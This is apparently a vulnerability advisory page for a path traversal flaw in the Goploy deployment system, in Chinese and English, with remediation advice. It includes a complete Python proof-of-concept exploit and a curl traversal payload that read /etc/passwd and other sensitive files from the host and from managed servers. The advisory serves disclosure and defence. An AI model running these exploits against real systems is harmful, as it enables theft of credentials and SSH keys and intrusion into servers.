  1. 环境 使用超管账号任意发布了一个项目: image

    设置了两个纳管服务器: image-1(1)

    创建了一个普通用户,并赋予menmber角色(文件对比权限): image-2

    image-3

  2. 获取普通用户权限 使用已注册的test账户登录系统,获取有效的身份认证凭证(Cookie/Token)。 image-4(1)

  3. 运行poc.py(见文末)

    • 参数解释: -u : 目标URL -t : 欲使用的Cookie/Token -f : 欲读取的文件 -s : 欲读取的纳管服务器的ID
    • 读取第一个纳管服务器: bash python poc.py -u http://192.168.x.x:8080 -t eyJhbGxxxxxxxxxx... -f /etc/passwd -s 1 image-6(1)

    image-5

    • 读取第二个纳管服务器: bash python poc.py -u http://192.168.x.x:8080 -t eyJhbGxxxxxxxxxx... -f /etc/passwd -s 2 image-8(1)
  4. 复现结果 服务器返回宿主机和任意远端服务器 /etc/passwd 文件的完整内容。

漏洞危害

通过该漏洞,攻击者可越权读取宿主机以及所有纳管服务器目标中的任何敏感文件。例如: - 读取本地或目标远端服务器的 /etc/passwd/etc/shadow 获取主机系统用户信息。 - 读取各个系统中用户的 SSH 私钥(如 ~/.ssh/id_rsa),从而利用私钥无需密码直接通过 SSH 远程连接宿主机或跨网段连接其他服务器,窃取服务器控制权,达到远程命令执行(RCE)的同等危害。 - 结合对 serverID 的枚举,攻击者可以将 Goploy 作为跳板机,针对所有绑定的下发目标系统进行大范围的信息窃取。 - 获取系统的各类关键配置文件、数据库凭证等。

修复建议

  1. 输入参数过滤:在接收并处理客户端传递的文件路径时,严格过滤 ../..\\ 以及 %00 等可能引起目录跨越与截断的特殊字符。
  2. 路径白名单约束:利用 filepath.Clean 等内置函数格式化路径,并且在执行系统文件读写操作前,强制校验解析后的绝对路径前缀是否处于应用所允许的合法受限目录范围(如预设的沙盒目录或项目工作区内)内。
  3. 权限最小化:运行 Goploy 服务的环境或镜像应尽可能以低权限用户身份运行,以此减弱被读取敏感文件的风险。
  4. 检查其他API:除以上API,还有多处API存在路径遍历漏洞,如果用户获得相应的权限,同样会导致任意文件读甚至写

poc.py

#!/usr/bin/env python3
import requests
import argparse
import sys
import urllib3
import json

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def banner():
    print(r"""
  ____             _               ____       ____ 
 / ___| ___  _ __ | | ___  _   _  |  _ \ ___ / ___|
| |  _ / _ \| '_ \| |/ _ \| | | | | |_) / _ \ |    
| |_| | (_) | |_) | | (_) | |_| | |  __/ (_) | |___ 
 \____|\___/| .__/|_|\___/ \__, | |_|   \___/ \____|
            |_|            |___/                    

    Goploy Authenticated Arbitrary File Read PoC
    """)

def exploit(target_url, token, file_read, args):
    if not target_url.startswith("http"):
        target_url = "http://" + target_url

    target_url = target_url.rstrip('/')

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }

    cookies = {
        "goploy_token": token
    }

    print("[*] 正在尝试自动从服务器响应中提取利用所需的所有参数ID...")

    # 1. 动态获取可用的 Namespace ID
    namespace_id = 1
    print(f"[*] 1. 尝试获取可用的 Namespace ID (/namespace/getOption)")
    try:
        r_ns = requests.get(f"{target_url}/namespace/getOption", headers=headers, cookies=cookies, verify=False, timeout=10)
        ns_data = r_ns.json()
        if ns_data.get("code") == 0 and len(ns_data.get("data", {}).get("list", [])) > 0:
            namespace_id = ns_data["data"]["list"][0]["namespaceId"]
            print(f"[+] 成功提取到 Namespace ID: {namespace_id}")
        else:
            print(f"[-] 提取 Namespace ID 失败或列表为空,将降级使用默认值 1")
    except Exception as e:
        print(f"[-] 提取 Namespace ID 发生异常: {e}")

    # 将获取到的 Namespace ID 放入后续请求的 Header 中
    headers["G-N-ID"] = str(namespace_id)

    # 2. 动态获取可用的 Server ID
    server_id = 1
    if args.server_id is not None:
        server_id = int(args.server_id)
        print(f"[*] 2. 用户指定了 Server ID: {server_id} ,跳过自动探测。可用于水平提权目标网络!")
    else:
        print(f"[*] 2. 尝试获取可用的 Server ID (/server/getOption)")
        try:
            r_srv = requests.get(f"{target_url}/server/getOption", headers=headers, cookies=cookies, verify=False, timeout=10)
            srv_data = r_srv.json()
            if srv_data.get("code") == 0 and len(srv_data.get("data", {}).get("list", [])) > 0:
                server_id = srv_data["data"]["list"][0]["id"]
                print(f"[+] 成功提取到可用 Server ID: {server_id}")
            else:
                print(f"[-] 提取 Server ID 失败或列表为空,将降级尝试猜测值 1")
        except Exception as e:
            print(f"[-] 提取 Server ID 发生异常: {e}")

    # 3. 动态获取可用的 Project ID
    project_id = 1
    print(f"[*] 3. 尝试获取可用的 Project ID (/deploy/getList)")
    try:
        r_proj = requests.get(f"{target_url}/deploy/getList", headers=headers, cookies=cookies, verify=False, timeout=10)
        proj_data = r_proj.json()
        if proj_data.get("code") == 0 and len(proj_data.get("data", {}).get("list", [])) > 0:
            project_id = proj_data["data"]["list"][0]["id"]
            print(f"[+] 成功提取到 Project ID: {project_id}")
        else:
            print(f"[-] 提取 Project ID 失败或列表为空,将降级尝试猜测值 1")
    except Exception as e:
        print(f"[-] 提取 Project ID 发生异常: {e}")

    # ==========================
    # 4. 执行漏洞利用
    # ==========================
    headers["Content-Type"] = "application/json"

    # 构造目录穿越 payload
    traversal_payload = "../" * 15 + file_read.lstrip('/')

    data = {
        "projectId": project_id,
        "serverId": server_id,
        "filePath": traversal_payload
    }

    url_exploit = f"{target_url}/deploy/fileDiff"
    print(f"\n[*] 目标地址: {url_exploit}")
    print(f"[*] Payload中包含的系统参数: NamespaceID={namespace_id}, ProjectID={project_id}, ServerID={server_id}")
    print(f"[*] 尝试读取文件: {file_read}")
    print(f"[*] 发送最终利用请求中...\n")

    try:
        response = requests.post(url_exploit, headers=headers, cookies=cookies, json=data, verify=False, timeout=10)

        if response.status_code == 200:
            try:
                # 尝试解析 Goploy 的 JSON 回显格式
                json_data = response.json()
                if json_data.get('code') in [0, 1, 2]: # 有时候读取回显为完整的 json 
                    data_obj = json_data.get('data') if isinstance(json_data.get('data'), dict) else {}

                    src_text = data_obj.get('srcText', '')
                    dist_text = data_obj.get('distText', '')

                    if src_text or dist_text:
                        print("[+] 漏洞利用成功!产生双重文件读取响应:\n")
                        print("=" * 50)
                        print(f"【Goploy宿主机 ({url_exploit} 本地) 的文件内容记录在 srcText】:")
                        print("-" * 50)
                        print(src_text if src_text else "(空)")
                        print("=" * 50)
                        print(f"【被控目标端服务器 (ServerID: {server_id}) 的文件内容记录在 distText】:")
                        print("-" * 50)
                        print(dist_text if dist_text else "(空)")
                        print("=" * 50)
                    else:
                        print("[-] 读取操作执行但未返回具体的 srcText 或 distText 数据。正在显示原始 API 返回:")
                        print(json.dumps(json_data, indent=2))
                else:
                    print(f"[-] 服务器返回业务错误 (Code={json_data.get('code')}): {json_data.get('message')}")
            except ValueError:
                # 如果不是 JSON 格式,直接输出响应源码
                print("[+] 收到未知格式响应,以下为原始正文内容:")
                print(response.text)
        else:
            print(f"[-] HTTP 请求失败,HTTP 状态码: {response.status_code}")
            print(response.text)

    except requests.exceptions.RequestException as e:
        print(f"[-] 连接出错: {e}")

if __name__ == "__main__":
    banner()
    parser = argparse.ArgumentParser(description="Goploy 任意文件读取概念验证脚本 (PoC)")
    parser.add_argument("-u", "--url", required=True, help="目标系统基础 URL,例如:http://192.168.240.130")
    parser.add_argument("-t", "--token", required=True, help="具有低权限成员账户的 goploy_token (Cookie)")
    parser.add_argument("-f", "--file", default="/etc/passwd", help="想要读取的目标绝对路径文件 (默认: /etc/passwd)")
    parser.add_argument("-s", "--server_id", default=None, help="强制指定想要读取的远程绑定服务器ServerID(如忽略则尝试自动获取首个)")

    args = parser.parse_args()

    exploit(args.url, args.token, args.file, args)

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/zhenorzz/goploy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.17.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-53553"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-07T23:42:24Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "\u003e [ Click here to jump to the Simplified Chinese version (\u70b9\u51fb\u8df3\u8f6c\u5230\u7b80\u4f53\u4e2d\u6587\u7248\u672c)](#goploy-\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6)\n# Goploy System Arbitrary File Read Vulnerability\n\n## Basic Information\n- **Vulnerability Name**: Goploy Endpoints Arbitrary File Read via Path Traversal\n- **Vulnerability Type**: Path Traversal (CWE-22) / Arbitrary File Read\n- **Affected Product**: Goploy\n- **Severity Level**: High (CVSS V3 7.7)\n- **Known Affected Versions**: \u003c=1.17.5 \n\n## Vulnerability Description\nGoploy is an open-source automation deployment system. A severe path traversal vulnerability exists in its backend API endpoints, specifically `/deploy/fileDiff` (File Compare), when handling file paths provided by the client.\n\nThe original logic of this endpoint is to read a local project file and compare it with a file on a remote target server. However, due to insufficient validation and sanitization of the `filePath` parameter, and the lack of security constraints on the final absolute file path, malicious paths containing `../` are directly executed within the system.\n\nThis leads to a **dual arbitrary file read** issue:\n1. **Local Host File Read**: `os.ReadFile` is tricked by the directory traversal payload to read any file via its absolute path on the Goploy local host (returned in the `srcText` field of the response body).\n2. **Remote Controlled Server File Read**: Subsequently, the same payload is utilized via the SFTP protocol on the target server pointed to by the `serverID`. Influenced similarly by the directory traversal, it reads any file on the configured remote server (returned in the `distText` field of the response body).\n\n**The threshold for exploiting this vulnerability is extremely low, and the conditions are very easily met.** The system comes with a built-in `member` role upon default installation, which is **granted the \"File Compare\" permission by default**. This means that as long as a normal low-privileged user is added to the system, they inherently possess the basic privileges required to call the vulnerable endpoint. The only prerequisite for the attack is that at least one project and one associated server are configured in the system.\n\nAn attacker only needs to specify the correct namespace header (e.g., `G-N-ID: 1`) via a packet capture tool to bypass simple restrictions. By enumerating available `serverId` parameters, the attacker can successfully execute path traversal via this endpoint, reading arbitrary files on both the local Goploy host and **all remote target servers managed by Goploy**.\n\n## Steps to Reproduce (Proof of Concept)\n\n### Theoretical Steps (See concrete steps below)\n1. **Obtain Normal User Privileges**\n   Log in to the system using any registered low-privileged account to obtain valid authentication credentials (Cookie/Token) and its corresponding authorized Namespace ID.\n\n2. **Construct Malicious Request**\n   Send a POST request containing the directory traversal characters `../` to the target endpoint `/deploy/fileDiff`, while including the `G-N-ID` header.\n\n   **PoC Example (Reading `/etc/passwd` and enumerating `serverId`):**\n   ```bash\n   curl -s -X POST -b \"goploy_token=\u003cvalid_cookie\u003e\" \\\n        -H \"Content-Type: application/json\" \\\n        -H \"G-N-ID: 1\" \\\n        -d \u0027{\"projectId\":1,\"serverId\":1,\"filePath\":\"../../../../../../../../../../etc/passwd\"}\u0027 \\\n        \"http://\u003ctarget-host\u003e/deploy/fileDiff\"\n   ```\n3. **Reproduction Result**\n   The server will return the complete contents of the `/etc/passwd` file from both the host and the remote server.\n\n### Concrete Steps\n1. **Environment Setup**\n    Published an arbitrary project using the super admin account:\n    \n    \n    \u003cimg width=\"1919\" height=\"428\" alt=\"image\" src=\"https://github.com/user-attachments/assets/8618a038-9088-45b4-804a-5541e243c6a8\" /\u003e\n\n\n    Configured two managed remote servers:\n    \n    \u003cimg width=\"1896\" height=\"399\" alt=\"image-1(1)\" src=\"https://github.com/user-attachments/assets/89cfa086-d20b-448e-9cf7-1af5798e3cfe\" /\u003e\n\n    Created a normal user and assigned the `member` role (which includes File Compare permission):\n    \n    \u003cimg width=\"1910\" height=\"343\" alt=\"image-2\" src=\"https://github.com/user-attachments/assets/b8dda364-c23d-4496-a555-ff477c511d31\" /\u003e\n\n    \n    \u003cimg width=\"951\" height=\"364\" alt=\"image-3\" src=\"https://github.com/user-attachments/assets/0e20cbed-7341-484c-b0a7-0fcd6ca2fea6\" /\u003e\n\n\n2. **Obtain Normal User Privileges**\n    Log in to the system using the registered `test` account to obtain valid authentication credentials (Cookie/Token).\n    \n    \n    \u003cimg width=\"1916\" height=\"712\" alt=\"image-4(1)\" src=\"https://github.com/user-attachments/assets/a269b79f-a666-4f3a-95c4-40621e1fbbc2\" /\u003e\n\n\n3. **Execute poc.py (See below)**\n    * **Parameter Explanation:**\n    `-u` : Target URL\n    `-t` : Target Cookie/Token to use\n    `-f` : File to read\n    `-s` : ID of the managed server to read from\n\n    * **Reading from the first managed server (Server ID: 1):**\n    ```bash\n    python poc.py -u http://192.168.x.x:8080 -t eyJhbGxxxxxxxxxx... -f /etc/passwd -s 1\n    ```\n    \n    \u003cimg width=\"1173\" height=\"608\" alt=\"image-6(1)\" src=\"https://github.com/user-attachments/assets/e442c247-3ebf-449f-94df-2b2b533b9449\" /\u003e\n\n    \u003cimg width=\"870\" height=\"190\" alt=\"image-5\" src=\"https://github.com/user-attachments/assets/9e53b13a-915c-4f5e-b1bc-f0b3c0b64656\" /\u003e\n\n\n    * **Reading from the second managed server (Server ID: 2):**\n    ```bash\n    python poc.py -u http://192.168.x.x:8080 -t eyJhbGxxxxxxxxxx... -f /etc/passwd -s 2\n    ```\n    \n    \u003cimg width=\"1173\" height=\"231\" alt=\"image-8(1)\" src=\"https://github.com/user-attachments/assets/54e77e8a-259d-4f74-bf31-1a9625bcbe52\" /\u003e\n\n\n4. **Reproduction Result**\n   The server successfully returns the full contents of the `/etc/passwd` file from both the Goploy host and the designated remote servers.\n\n## Impact\nThrough this vulnerability, an attacker can bypass authorization to read any sensitive files on the host machine as well as all managed target servers. For example:\n- Read `/etc/passwd` or `/etc/shadow` on the local or remote target servers to obtain host system user information.\n- Read users\u0027 SSH private keys (e.g., `~/.ssh/id_rsa`) across different systems, enabling passwordless SSH access to the host or cross-network connections to other servers to steal administrative control, achieving the equivalent of Remote Code Execution (RCE).\n- By enumerating the `serverID`, an attacker can use Goploy as a jump server (bastion host) to conduct large-scale information theft against all bound deployment target systems.\n- Obtain various critical configuration files, database credentials, etc., of the affected systems.\n\n## Remediation Suggestions\n1. **Input Parameter Filtering**: Strictly filter special characters such as `../`, `..\\`, and `%00` that can cause directory traversal and truncation when receiving and processing file paths provided by clients.\n2. **Path Whitelist Constraints**: Use built-in functions like `filepath.Clean` to format the path. Before executing system file read/write operations, strictly verify whether the parsed absolute path prefix is within the legitimate restricted directory scope allowed by the application (such as a preset sandbox directory or project workspace).\n3. **Principle of Least Privilege**: The environment or Docker container running the Goploy service should be executed with low-privileged user identities whenever possible, to mitigate the risk of sensitive system files being read.\n4. **Comprehensive API Audit**: Apart from the APIs mentioned above, there are multiple other APIs that suffer from similar path traversal vulnerabilities. If users obtain the corresponding permissions, it can lead to arbitrary file reads **or even writes**.\n\n## poc.py\n```python\n#!/usr/bin/env python3\nimport requests\nimport argparse\nimport sys\nimport urllib3\nimport json\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndef banner():\n    print(r\"\"\"\n  ____             _               ____       ____ \n / ___| ___  _ __ | | ___  _   _  |  _ \\ ___ / ___|\n| |  _ / _ \\| \u0027_ \\| |/ _ \\| | | | | |_) / _ \\ |    \n| |_| | (_) | |_) | | (_) | |_| | |  __/ (_) | |___ \n \\____|\\___/| .__/|_|\\___/ \\__, | |_|   \\___/ \\____|\n            |_|            |___/                    \n\n    Goploy Authenticated Arbitrary File Read PoC\n    \"\"\")\n\ndef exploit(target_url, token, file_read, args):\n    if not target_url.startswith(\"http\"):\n        target_url = \"http://\" + target_url\n    \n    target_url = target_url.rstrip(\u0027/\u0027)\n    \n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\"\n    }\n    \n    cookies = {\n        \"goploy_token\": token\n    }\n    \n    print(\"[*] \u6b63\u5728\u5c1d\u8bd5\u81ea\u52a8\u4ece\u670d\u52a1\u5668\u54cd\u5e94\u4e2d\u63d0\u53d6\u5229\u7528\u6240\u9700\u7684\u6240\u6709\u53c2\u6570ID...\")\n    \n    # 1. \u52a8\u6001\u83b7\u53d6\u53ef\u7528\u7684 Namespace ID\n    namespace_id = 1\n    print(f\"[*] 1. \u5c1d\u8bd5\u83b7\u53d6\u53ef\u7528\u7684 Namespace ID (/namespace/getOption)\")\n    try:\n        r_ns = requests.get(f\"{target_url}/namespace/getOption\", headers=headers, cookies=cookies, verify=False, timeout=10)\n        ns_data = r_ns.json()\n        if ns_data.get(\"code\") == 0 and len(ns_data.get(\"data\", {}).get(\"list\", [])) \u003e 0:\n            namespace_id = ns_data[\"data\"][\"list\"][0][\"namespaceId\"]\n            print(f\"[+] \u6210\u529f\u63d0\u53d6\u5230 Namespace ID: {namespace_id}\")\n        else:\n            print(f\"[-] \u63d0\u53d6 Namespace ID \u5931\u8d25\u6216\u5217\u8868\u4e3a\u7a7a\uff0c\u5c06\u964d\u7ea7\u4f7f\u7528\u9ed8\u8ba4\u503c 1\")\n    except Exception as e:\n        print(f\"[-] \u63d0\u53d6 Namespace ID \u53d1\u751f\u5f02\u5e38: {e}\")\n\n    # \u5c06\u83b7\u53d6\u5230\u7684 Namespace ID \u653e\u5165\u540e\u7eed\u8bf7\u6c42\u7684 Header \u4e2d\n    headers[\"G-N-ID\"] = str(namespace_id)\n\n    # 2. \u52a8\u6001\u83b7\u53d6\u53ef\u7528\u7684 Server ID\n    server_id = 1\n    if args.server_id is not None:\n        server_id = int(args.server_id)\n        print(f\"[*] 2. \u7528\u6237\u6307\u5b9a\u4e86 Server ID: {server_id} ,\u8df3\u8fc7\u81ea\u52a8\u63a2\u6d4b\u3002\u53ef\u7528\u4e8e\u6c34\u5e73\u63d0\u6743\u76ee\u6807\u7f51\u7edc\uff01\")\n    else:\n        print(f\"[*] 2. \u5c1d\u8bd5\u83b7\u53d6\u53ef\u7528\u7684 Server ID (/server/getOption)\")\n        try:\n            r_srv = requests.get(f\"{target_url}/server/getOption\", headers=headers, cookies=cookies, verify=False, timeout=10)\n            srv_data = r_srv.json()\n            if srv_data.get(\"code\") == 0 and len(srv_data.get(\"data\", {}).get(\"list\", [])) \u003e 0:\n                server_id = srv_data[\"data\"][\"list\"][0][\"id\"]\n                print(f\"[+] \u6210\u529f\u63d0\u53d6\u5230\u53ef\u7528 Server ID: {server_id}\")\n            else:\n                print(f\"[-] \u63d0\u53d6 Server ID \u5931\u8d25\u6216\u5217\u8868\u4e3a\u7a7a\uff0c\u5c06\u964d\u7ea7\u5c1d\u8bd5\u731c\u6d4b\u503c 1\")\n        except Exception as e:\n            print(f\"[-] \u63d0\u53d6 Server ID \u53d1\u751f\u5f02\u5e38: {e}\")\n\n    # 3. \u52a8\u6001\u83b7\u53d6\u53ef\u7528\u7684 Project ID\n    project_id = 1\n    print(f\"[*] 3. \u5c1d\u8bd5\u83b7\u53d6\u53ef\u7528\u7684 Project ID (/deploy/getList)\")\n    try:\n        r_proj = requests.get(f\"{target_url}/deploy/getList\", headers=headers, cookies=cookies, verify=False, timeout=10)\n        proj_data = r_proj.json()\n        if proj_data.get(\"code\") == 0 and len(proj_data.get(\"data\", {}).get(\"list\", [])) \u003e 0:\n            project_id = proj_data[\"data\"][\"list\"][0][\"id\"]\n            print(f\"[+] \u6210\u529f\u63d0\u53d6\u5230 Project ID: {project_id}\")\n        else:\n            print(f\"[-] \u63d0\u53d6 Project ID \u5931\u8d25\u6216\u5217\u8868\u4e3a\u7a7a\uff0c\u5c06\u964d\u7ea7\u5c1d\u8bd5\u731c\u6d4b\u503c 1\")\n    except Exception as e:\n        print(f\"[-] \u63d0\u53d6 Project ID \u53d1\u751f\u5f02\u5e38: {e}\")\n\n    # ==========================\n    # 4. \u6267\u884c\u6f0f\u6d1e\u5229\u7528\n    # ==========================\n    headers[\"Content-Type\"] = \"application/json\"\n    \n    # \u6784\u9020\u76ee\u5f55\u7a7f\u8d8a payload\n    traversal_payload = \"../\" * 15 + file_read.lstrip(\u0027/\u0027)\n    \n    data = {\n        \"projectId\": project_id,\n        \"serverId\": server_id,\n        \"filePath\": traversal_payload\n    }\n\n    url_exploit = f\"{target_url}/deploy/fileDiff\"\n    print(f\"\\n[*] \u76ee\u6807\u5730\u5740: {url_exploit}\")\n    print(f\"[*] Payload\u4e2d\u5305\u542b\u7684\u7cfb\u7edf\u53c2\u6570: NamespaceID={namespace_id}, ProjectID={project_id}, ServerID={server_id}\")\n    print(f\"[*] \u5c1d\u8bd5\u8bfb\u53d6\u6587\u4ef6: {file_read}\")\n    print(f\"[*] \u53d1\u9001\u6700\u7ec8\u5229\u7528\u8bf7\u6c42\u4e2d...\\n\")\n\n    try:\n        response = requests.post(url_exploit, headers=headers, cookies=cookies, json=data, verify=False, timeout=10)\n        \n        if response.status_code == 200:\n            try:\n                # \u5c1d\u8bd5\u89e3\u6790 Goploy \u7684 JSON \u56de\u663e\u683c\u5f0f\n                json_data = response.json()\n                if json_data.get(\u0027code\u0027) in [0, 1, 2]: # \u6709\u65f6\u5019\u8bfb\u53d6\u56de\u663e\u4e3a\u5b8c\u6574\u7684 json \n                    data_obj = json_data.get(\u0027data\u0027) if isinstance(json_data.get(\u0027data\u0027), dict) else {}\n                    \n                    src_text = data_obj.get(\u0027srcText\u0027, \u0027\u0027)\n                    dist_text = data_obj.get(\u0027distText\u0027, \u0027\u0027)\n                    \n                    if src_text or dist_text:\n                        print(\"[+] \u6f0f\u6d1e\u5229\u7528\u6210\u529f\uff01\u4ea7\u751f\u53cc\u91cd\u6587\u4ef6\u8bfb\u53d6\u54cd\u5e94\uff1a\\n\")\n                        print(\"=\" * 50)\n                        print(f\"\u3010Goploy\u5bbf\u4e3b\u673a ({url_exploit} \u672c\u5730) \u7684\u6587\u4ef6\u5185\u5bb9\u8bb0\u5f55\u5728 srcText\u3011:\")\n                        print(\"-\" * 50)\n                        print(src_text if src_text else \"(\u7a7a)\")\n                        print(\"=\" * 50)\n                        print(f\"\u3010\u88ab\u63a7\u76ee\u6807\u7aef\u670d\u52a1\u5668 (ServerID: {server_id}) \u7684\u6587\u4ef6\u5185\u5bb9\u8bb0\u5f55\u5728 distText\u3011:\")\n                        print(\"-\" * 50)\n                        print(dist_text if dist_text else \"(\u7a7a)\")\n                        print(\"=\" * 50)\n                    else:\n                        print(\"[-] \u8bfb\u53d6\u64cd\u4f5c\u6267\u884c\u4f46\u672a\u8fd4\u56de\u5177\u4f53\u7684 srcText \u6216 distText \u6570\u636e\u3002\u6b63\u5728\u663e\u793a\u539f\u59cb API \u8fd4\u56de\uff1a\")\n                        print(json.dumps(json_data, indent=2))\n                else:\n                    print(f\"[-] \u670d\u52a1\u5668\u8fd4\u56de\u4e1a\u52a1\u9519\u8bef (Code={json_data.get(\u0027code\u0027)}): {json_data.get(\u0027message\u0027)}\")\n            except ValueError:\n                # \u5982\u679c\u4e0d\u662f JSON \u683c\u5f0f\uff0c\u76f4\u63a5\u8f93\u51fa\u54cd\u5e94\u6e90\u7801\n                print(\"[+] \u6536\u5230\u672a\u77e5\u683c\u5f0f\u54cd\u5e94\uff0c\u4ee5\u4e0b\u4e3a\u539f\u59cb\u6b63\u6587\u5185\u5bb9\uff1a\")\n                print(response.text)\n        else:\n            print(f\"[-] HTTP \u8bf7\u6c42\u5931\u8d25\uff0cHTTP \u72b6\u6001\u7801: {response.status_code}\")\n            print(response.text)\n            \n    except requests.exceptions.RequestException as e:\n        print(f\"[-] \u8fde\u63a5\u51fa\u9519: {e}\")\n\nif __name__ == \"__main__\":\n    banner()\n    parser = argparse.ArgumentParser(description=\"Goploy \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6982\u5ff5\u9a8c\u8bc1\u811a\u672c (PoC)\")\n    parser.add_argument(\"-u\", \"--url\", required=True, help=\"\u76ee\u6807\u7cfb\u7edf\u57fa\u7840 URL\uff0c\u4f8b\u5982\uff1ahttp://192.168.240.130\")\n    parser.add_argument(\"-t\", \"--token\", required=True, help=\"\u5177\u6709\u4f4e\u6743\u9650\u6210\u5458\u8d26\u6237\u7684 goploy_token (Cookie)\")\n    parser.add_argument(\"-f\", \"--file\", default=\"/etc/passwd\", help=\"\u60f3\u8981\u8bfb\u53d6\u7684\u76ee\u6807\u7edd\u5bf9\u8def\u5f84\u6587\u4ef6 (\u9ed8\u8ba4: /etc/passwd)\")\n    parser.add_argument(\"-s\", \"--server_id\", default=None, help=\"\u5f3a\u5236\u6307\u5b9a\u60f3\u8981\u8bfb\u53d6\u7684\u8fdc\u7a0b\u7ed1\u5b9a\u670d\u52a1\u5668ServerID(\u5982\u5ffd\u7565\u5219\u5c1d\u8bd5\u81ea\u52a8\u83b7\u53d6\u9996\u4e2a)\")\n    \n    args = parser.parse_args()\n    \n    exploit(args.url, args.token, args.file, args)\n\n```\n\n\n---\n\n\n\n# Goploy \u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\n\n## \u6f0f\u6d1e\u57fa\u672c\u4fe1\u606f\n- **\u6f0f\u6d1e\u540d\u79f0**\uff1aGoploy \u7cfb\u7edf\u7aef\u70b9\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\n- **\u6f0f\u6d1e\u7c7b\u578b**\uff1a\u8def\u5f84\u904d\u5386\uff08Path Traversal, CWE-22\uff09 / \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\n- **\u5f71\u54cd\u4ea7\u54c1**\uff1aGoploy\n- **\u6f0f\u6d1e\u5371\u5bb3\u7ea7\u522b**\uff1a\u9ad8\u5371\uff08CVSS V3 7.7\uff09\n- **\u5df2\u77e5\u5f71\u54cd\u7248\u672c**\uff1a\u003c=1.17.5\n\n## \u6f0f\u6d1e\u63cf\u8ff0\nGoploy \u662f\u4e00\u4e2a\u5f00\u6e90\u7684\u81ea\u52a8\u5316\u90e8\u7f72\u7cfb\u7edf\u3002\u5728\u5176\u540e\u7aef\u670d\u52a1\u7684 `/deploy/fileDiff`\uff08\u6587\u4ef6\u5bf9\u6bd4\uff09\u7b49 API \u63a5\u53e3\u5904\u5904\u7406\u5ba2\u6237\u7aef\u4f20\u6765\u7684\u6587\u4ef6\u8def\u5f84\u65f6\uff0c\u5b58\u5728\u4e25\u91cd\u7684\u8def\u5f84\u904d\u5386\u6f0f\u6d1e\u3002\n\n\u8be5\u63a5\u53e3\u7684\u539f\u59cb\u903b\u8f91\u662f\u8bfb\u53d6\u672c\u5730\u9879\u76ee\u6587\u4ef6\u4e0e\u8fdc\u7a0b\u76ee\u6807\u670d\u52a1\u5668\u6587\u4ef6\u8fdb\u884c\u6bd4\u5bf9\u3002\u4f46\u7531\u4e8e\u672a\u80fd\u5145\u5206\u6821\u9a8c\u53ca\u8fc7\u6ee4\u7528\u6237\u4f20\u5165\u7684 `filePath` \u53c2\u6570\uff0c\u4e5f\u6ca1\u6709\u5bf9\u6700\u7ec8\u7684\u6587\u4ef6\u7edd\u5bf9\u8def\u5f84\u8fdb\u884c\u5b89\u5168\u7ea6\u675f\uff0c\u5c06\u542b\u6709 `../` \u7684\u6076\u610f\u8def\u5f84\u76f4\u63a5\u5e26\u5165\u7cfb\u7edf\u4e2d\u6267\u884c\u3002\n\u8fd9\u5bfc\u81f4\u4e86\u4e00\u4e2a**\u53cc\u91cd\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6**\u7684\u95ee\u9898\uff1a\n1. \u672c\u5730\u5bbf\u4e3b\u673a\u6587\u4ef6\u8bfb\u53d6\uff1a`os.ReadFile` \u4f1a\u88ab\u76ee\u5f55\u7a7f\u8d8a payload \u6b3a\u9a97\uff0c\u8bfb\u53d6\u51fa Goploy \u5bbf\u4e3b\u673a\u7684\u672c\u5730\u7edd\u5bf9\u8def\u5f84\u4efb\u610f\u6587\u4ef6\uff08\u8fd4\u56de\u5728\u54cd\u5e94\u4f53\u7684 `srcText` \u5b57\u6bb5\uff09\u3002\n2. \u8fdc\u7a0b\u4efb\u610f\u53d7\u63a7\u670d\u52a1\u5668\u6587\u4ef6\u8bfb\u53d6\uff1a\u7d27\u63a5\u7740\u8be5 payload \u7ecf\u7531 SFTP \u534f\u8bae\u4f5c\u7528\u4e8e `serverID` \u6240\u6307\u5411\u7684\u76ee\u6807\u670d\u52a1\u5668\uff0c\u540c\u6837\u7531\u4e8e\u53d7\u5230\u76ee\u5f55\u7a7f\u8d8a\u5f71\u54cd\uff0c\u6700\u7ec8\u8bfb\u53d6\u6240\u914d\u7f6e\u8fdc\u7a0b\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u6587\u4ef6\uff08\u8fd4\u56de\u5728\u54cd\u5e94\u4f53\u7684 `distText` \u5b57\u6bb5\uff09\u3002\n\n**\u8be5\u6f0f\u6d1e\u5229\u7528\u95e8\u69db\u6781\u4f4e\u4e14\u6761\u4ef6\u6781\u6613\u6ee1\u8db3\u3002** \u7cfb\u7edf\u5728\u9ed8\u8ba4\u5b89\u88c5\u65f6\u9884\u8bbe\u4e86 `member`\uff08\u666e\u901a\u6210\u5458\uff09\u89d2\u8272\uff0c\u4e14**\u9ed8\u8ba4\u8d4b\u4e88\u4e86\u8be5\u89d2\u8272\u201c\u6587\u4ef6\u6bd4\u5bf9 